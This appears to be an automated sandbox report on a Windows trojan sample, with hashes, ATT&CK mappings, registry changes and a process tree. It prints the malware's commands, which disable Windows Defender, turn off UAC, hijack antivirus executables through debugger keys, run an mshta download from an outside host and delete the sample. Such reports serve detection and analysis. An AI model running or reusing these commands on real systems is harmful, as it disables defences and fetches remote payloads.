16fed893171b69ceb22b85992f486ff2fd45d26de273deced2fb46b2517d755f

Analysis

max time kernel
150s
max time network
118s
platform
windows7_x64
resource
win7-20240903-en
resource tags

arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system
submitted
19/09/2024, 05:14

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe
Size

2.2MB
MD5

eaa6966575d28fa84ddcf3ba17c4d07e
SHA1

f5f44be0cb637bea6348e506ee94136bb41bfa8f
SHA256

16fed893171b69ceb22b85992f486ff2fd45d26de273deced2fb46b2517d755f
SHA512

57769e221cf3127284ded0c043d977168a7d5395abc2d095cbbd7564f0e5bae5574100e1364df2116e29db4244eea87d344041983c2a62328f3a12f24f72060d
SSDEEP

49152:mDwQZshctg3xglTVGI8HoBfAIPYiiqowvq00p7PiKXT0phLdlh:mDwQEuUxglcI8HoiIrwzXopZdL

Score

10^/10

defense_evasion discovery evasion execution persistence trojan

Malware Config

Extracted

Language

hta

Source

URLs

hta.dropper

http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=UPNECVIU&2=i-s&3=17&4=7601&5=6&6=1&7=99600&8=1033

Signatures

Disables service(s) 3 TTPs
evasion execution

Windows Service
T1543.003

Service Stop
T1489

Service Execution
T1569.002

Modifies WinLogon for persistence 2 TTPs 1 IoCs

persistence

Winlogon Helper DLL

T1547.004

Modify Registry

T1112

description	ioc	Process
Set value (str)	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell = "C:\\Users\\Admin\\AppData\\Roaming\\Microsoft\\phyfre.exe"	phyfre.exe

UAC bypass 3 TTPs 3 IoCs

evasion trojan

Bypass User Account Control

T1548.002

Disable or Modify Tools

T1562.001

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	phyfre.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	phyfre.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	phyfre.exe

Event Triggered Execution: Image File Execution Options Injection 1 TTPs 16 IoCs

persistence

Image File Execution Options Injection

T1546.012

description	ioc	Process
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe\Debugger = "svchost.exe"	phyfre.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe\Debugger = "svchost.exe"	phyfre.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe	phyfre.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msascui.exe\Debugger = "svchost.exe"	phyfre.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe	phyfre.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\egui.exe\Debugger = "svchost.exe"	phyfre.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe\Debugger = "svchost.exe"	phyfre.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe\Debugger = "svchost.exe"	phyfre.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msmpeng.exe	phyfre.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe	phyfre.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe	phyfre.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\msseces.exe\Debugger = "svchost.exe"	phyfre.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\ekrn.exe	phyfre.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastui.exe	phyfre.exe
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\avastsvc.exe	phyfre.exe
Set value (str)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\afwserv.exe\Debugger = "svchost.exe"	phyfre.exe

Stops running service(s) 4 TTPs
evasion execution

Windows Service
T1543.003

Impair Defenses
T1562

Service Stop
T1489

Service Execution
T1569.002

Deletes itself 1 IoCs

pid	Process
2700	cmd.exe

Executes dropped EXE 1 IoCs

pid	Process
2620	phyfre.exe

Loads dropped DLL 2 IoCs

pid	Process
1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe
1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe

Checks whether UAC is enabled 1 TTPs 1 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	phyfre.exe

Indicator Removal: File Deletion 1 TTPs
Adversaries may delete files left behind by the actions of their intrusion activity.
defense_evasion

File Deletion
T1070.004

Launches sc.exe 6 IoCs

Sc.exe is a Windows utlilty to control services on the system.

pid	Process
2264	sc.exe
2880	sc.exe
2632	sc.exe
1644	sc.exe
2896	sc.exe
2720	sc.exe

System Location Discovery: System Language Discovery 1 TTPs 14 IoCs

Attempt gather information about the system language of a victim in order to infer the geographical location of that host.

discovery

System Language Discovery

T1614.001

description	ioc	Process
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	phyfre.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	sc.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	net1.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language	mshta.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1488793075-819845221-1497111674-1000\Software\Microsoft\Internet Explorer\Main	mshta.exe

Runs net.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

pid	Process
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe

Suspicious use of AdjustPrivilegeToken 4 IoCs

description	pid	Process
Token: SeDebugPrivilege	2620	phyfre.exe
Token: SeShutdownPrivilege	2620	phyfre.exe
Token: SeDebugPrivilege	2620	phyfre.exe
Token: SeShutdownPrivilege	2620	phyfre.exe

Suspicious use of FindShellTrayWindow 4 IoCs

pid	Process
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe
2620	phyfre.exe

Suspicious use of WriteProcessMemory 52 IoCs

description	pid	Process	procid_target
PID 1800 wrote to memory of 2720	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	30
PID 1800 wrote to memory of 2720	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	30
PID 1800 wrote to memory of 2720	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	30
PID 1800 wrote to memory of 2720	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	30
PID 1800 wrote to memory of 2264	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	31
PID 1800 wrote to memory of 2264	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	31
PID 1800 wrote to memory of 2264	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	31
PID 1800 wrote to memory of 2264	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	31
PID 1800 wrote to memory of 2768	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	33
PID 1800 wrote to memory of 2768	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	33
PID 1800 wrote to memory of 2768	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	33
PID 1800 wrote to memory of 2768	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	33
PID 1800 wrote to memory of 2880	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	34
PID 1800 wrote to memory of 2880	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	34
PID 1800 wrote to memory of 2880	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	34
PID 1800 wrote to memory of 2880	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	34
PID 1800 wrote to memory of 2620	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	38
PID 1800 wrote to memory of 2620	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	38
PID 1800 wrote to memory of 2620	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	38
PID 1800 wrote to memory of 2620	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	38
PID 2768 wrote to memory of 2308	2768	net.exe	39
PID 2768 wrote to memory of 2308	2768	net.exe	39
PID 2768 wrote to memory of 2308	2768	net.exe	39
PID 2768 wrote to memory of 2308	2768	net.exe	39
PID 1800 wrote to memory of 2700	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	40
PID 1800 wrote to memory of 2700	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	40
PID 1800 wrote to memory of 2700	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	40
PID 1800 wrote to memory of 2700	1800	eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe	40
PID 2620 wrote to memory of 2896	2620	phyfre.exe	42
PID 2620 wrote to memory of 2896	2620	phyfre.exe	42
PID 2620 wrote to memory of 2896	2620	phyfre.exe	42
PID 2620 wrote to memory of 2896	2620	phyfre.exe	42
PID 2620 wrote to memory of 1644	2620	phyfre.exe	43
PID 2620 wrote to memory of 1644	2620	phyfre.exe	43
PID 2620 wrote to memory of 1644	2620	phyfre.exe	43
PID 2620 wrote to memory of 1644	2620	phyfre.exe	43
PID 2620 wrote to memory of 2612	2620	phyfre.exe	44
PID 2620 wrote to memory of 2612	2620	phyfre.exe	44
PID 2620 wrote to memory of 2612	2620	phyfre.exe	44
PID 2620 wrote to memory of 2612	2620	phyfre.exe	44
PID 2620 wrote to memory of 2632	2620	phyfre.exe	46
PID 2620 wrote to memory of 2632	2620	phyfre.exe	46
PID 2620 wrote to memory of 2632	2620	phyfre.exe	46
PID 2620 wrote to memory of 2632	2620	phyfre.exe	46
PID 2612 wrote to memory of 2664	2612	net.exe	49
PID 2612 wrote to memory of 2664	2612	net.exe	49
PID 2612 wrote to memory of 2664	2612	net.exe	49
PID 2612 wrote to memory of 2664	2612	net.exe	49
PID 2620 wrote to memory of 524	2620	phyfre.exe	51
PID 2620 wrote to memory of 524	2620	phyfre.exe	51
PID 2620 wrote to memory of 524	2620	phyfre.exe	51
PID 2620 wrote to memory of 524	2620	phyfre.exe	51

System policy modification 1 TTPs 4 IoCs

evasion

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System	phyfre.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0"	phyfre.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorAdmin = "0"	phyfre.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\ConsentPromptBehaviorUser = "0"	phyfre.exe

C:\Users\Admin\AppData\Local\Temp\eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe
"C:\Users\Admin\AppData\Local\Temp\eaa6966575d28fa84ddcf3ba17c4d07e_JaffaCakes118.exe"
1⤵
- Loads dropped DLL
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1800
- C:\Windows\SysWOW64\sc.exe
  sc stop WinDefend
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2720
- C:\Windows\SysWOW64\sc.exe
  sc config WinDefend start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2264
- C:\Windows\SysWOW64\net.exe
  net stop msmpsvc
  2⤵
  - System Location Discovery: System Language Discovery
  - Suspicious use of WriteProcessMemory
  PID:2768
- - C:\Windows\SysWOW64\net1.exe
    C:\Windows\system32\net1 stop msmpsvc
    3⤵
    - System Location Discovery: System Language Discovery
    PID:2308
- C:\Windows\SysWOW64\sc.exe
  sc config msmpsvc start= disabled
  2⤵
  - Launches sc.exe
  - System Location Discovery: System Language Discovery
  PID:2880
- C:\Users\Admin\AppData\Roaming\Microsoft\phyfre.exe
  C:\Users\Admin\AppData\Roaming\Microsoft\phyfre.exe
  2⤵
  - Modifies WinLogon for persistence
  - UAC bypass
  - Event Triggered Execution: Image File Execution Options Injection
  - Executes dropped EXE
  - Checks whether UAC is enabled
  - System Location Discovery: System Language Discovery
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of AdjustPrivilegeToken
  - Suspicious use of FindShellTrayWindow
  - Suspicious use of WriteProcessMemory
  - System policy modification
  PID:2620
- - C:\Windows\SysWOW64\sc.exe
    sc stop WinDefend
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2896
- - C:\Windows\SysWOW64\sc.exe
    sc config WinDefend start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:1644
- - C:\Windows\SysWOW64\net.exe
    net stop msmpsvc
    3⤵
    - System Location Discovery: System Language Discovery
    - Suspicious use of WriteProcessMemory
    PID:2612
  - - C:\Windows\SysWOW64\net1.exe
      C:\Windows\system32\net1 stop msmpsvc
      4⤵
      System Location Discovery: System Language Discovery
      PID:2664
- - C:\Windows\SysWOW64\sc.exe
    sc config msmpsvc start= disabled
    3⤵
    - Launches sc.exe
    - System Location Discovery: System Language Discovery
    PID:2632
- - C:\Windows\SysWOW64\mshta.exe
    mshta.exe "http://softscoreinc.com/soft-usage/favicon.ico?0=1200&1=UPNECVIU&2=i-s&3=17&4=7601&5=6&6=1&7=99600&8=1033"
    3⤵
    - System Location Discovery: System Language Discovery
    - Modifies Internet Explorer settings
    PID:524
- C:\Windows\SysWOW64\cmd.exe
  "C:\Windows\system32\cmd.exe" /c del "C:\Users\Admin\AppData\Local\Temp\EAA696~1.EXE" >> NUL
  2⤵
  - Deletes itself
  - System Location Discovery: System Language Discovery
  PID:2700

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

System Services

T1569

Service Execution

T1569.002

Persistence

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Privilege Escalation

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Boot or Logon Autostart Execution

T1547

Winlogon Helper DLL

T1547.004

Create or Modify System Process

T1543

Windows Service

T1543.003

Event Triggered Execution

T1546

Image File Execution Options Injection

T1546.012

Defense Evasion

Abuse Elevation Control Mechanism

T1548

Bypass User Account Control

T1548.002

Impair Defenses

T1562

Disable or Modify Tools

T1562.001

Indicator Removal

T1070

File Deletion

T1070.004

Modify Registry

T1112

Credential Access

Discovery

System Information Discovery

T1082

System Location Discovery

T1614

System Language Discovery

T1614.001

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Service Stop

T1489

Replay Monitor

Loading Replay Monitor...

Downloads

\Users\Admin\AppData\Roaming\Microsoft\phyfre.exe

Filesize
2.2MB

MD5
eaa6966575d28fa84ddcf3ba17c4d07e

SHA1
f5f44be0cb637bea6348e506ee94136bb41bfa8f

SHA256
16fed893171b69ceb22b85992f486ff2fd45d26de273deced2fb46b2517d755f

SHA512
57769e221cf3127284ded0c043d977168a7d5395abc2d095cbbd7564f0e5bae5574100e1364df2116e29db4244eea87d344041983c2a62328f3a12f24f72060d

Download Submit
memory/1800-17-0x0000000003620000-0x0000000003621000-memory.dmp

Filesize
4KB

Download
memory/1800-30-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-38-0x00000000033F0000-0x00000000033F2000-memory.dmp

Filesize
8KB

Download
memory/1800-37-0x0000000003450000-0x0000000003451000-memory.dmp

Filesize
4KB

Download
memory/1800-36-0x0000000003450000-0x0000000003451000-memory.dmp

Filesize
4KB

Download
memory/1800-35-0x0000000003400000-0x0000000003402000-memory.dmp

Filesize
8KB

Download
memory/1800-34-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-33-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-32-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-16-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-41-0x0000000003420000-0x0000000003421000-memory.dmp

Filesize
4KB

Download
memory/1800-29-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-28-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-27-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-26-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-25-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-24-0x0000000002080000-0x00000000020DA000-memory.dmp

Filesize
360KB

Download
memory/1800-23-0x0000000003620000-0x0000000003621000-memory.dmp

Filesize
4KB

Download
memory/1800-22-0x0000000003620000-0x0000000003621000-memory.dmp

Filesize
4KB

Download
memory/1800-21-0x0000000003620000-0x0000000003621000-memory.dmp

Filesize
4KB

Download
memory/1800-20-0x0000000003620000-0x0000000003621000-memory.dmp

Filesize
4KB

Download
memory/1800-19-0x0000000003620000-0x0000000003621000-memory.dmp

Filesize
4KB

Download
memory/1800-39-0x00000000001B0000-0x00000000001B1000-memory.dmp

Filesize
4KB

Download
memory/1800-18-0x0000000003620000-0x0000000003621000-memory.dmp

Filesize
4KB

Download
memory/1800-31-0x0000000003400000-0x0000000003401000-memory.dmp

Filesize
4KB

Download
memory/1800-15-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/1800-14-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/1800-13-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/1800-12-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/1800-11-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/1800-10-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/1800-9-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/1800-8-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/1800-7-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/1800-6-0x0000000002060000-0x0000000002061000-memory.dmp

Filesize
4KB

Download
memory/1800-5-0x0000000002010000-0x0000000002011000-memory.dmp

Filesize
4KB

Download
memory/1800-4-0x0000000002040000-0x0000000002041000-memory.dmp

Filesize
4KB

Download
memory/1800-3-0x0000000000A30000-0x0000000000A31000-memory.dmp

Filesize
4KB

Download
memory/1800-2-0x0000000001FE0000-0x0000000001FE1000-memory.dmp

Filesize
4KB

Download
memory/1800-1-0x0000000001FF0000-0x0000000001FF1000-memory.dmp

Filesize
4KB

Download
memory/1800-0-0x0000000000400000-0x000000000082F000-memory.dmp

Filesize
4.2MB

Download
memory/1800-42-0x0000000003410000-0x0000000003411000-memory.dmp

Filesize
4KB

Download
memory/1800-50-0x00000000047E0000-0x0000000004C0F000-memory.dmp

Filesize
4.2MB

Download
memory/1800-53-0x0000000002080000-0x00000000020DA000-memory.dmp

Filesize
360KB

Download
memory/1800-40-0x00000000001C0000-0x00000000001C1000-memory.dmp

Filesize
4KB

Download
memory/1800-54-0x0000000000400000-0x000000000082F000-memory.dmp

Filesize
4.2MB

Download
memory/2620-55-0x0000000000400000-0x000000000082F000-memory.dmp

Filesize
4.2MB

Download
memory/2620-56-0x0000000000400000-0x000000000082F000-memory.dmp

Filesize
4.2MB

Download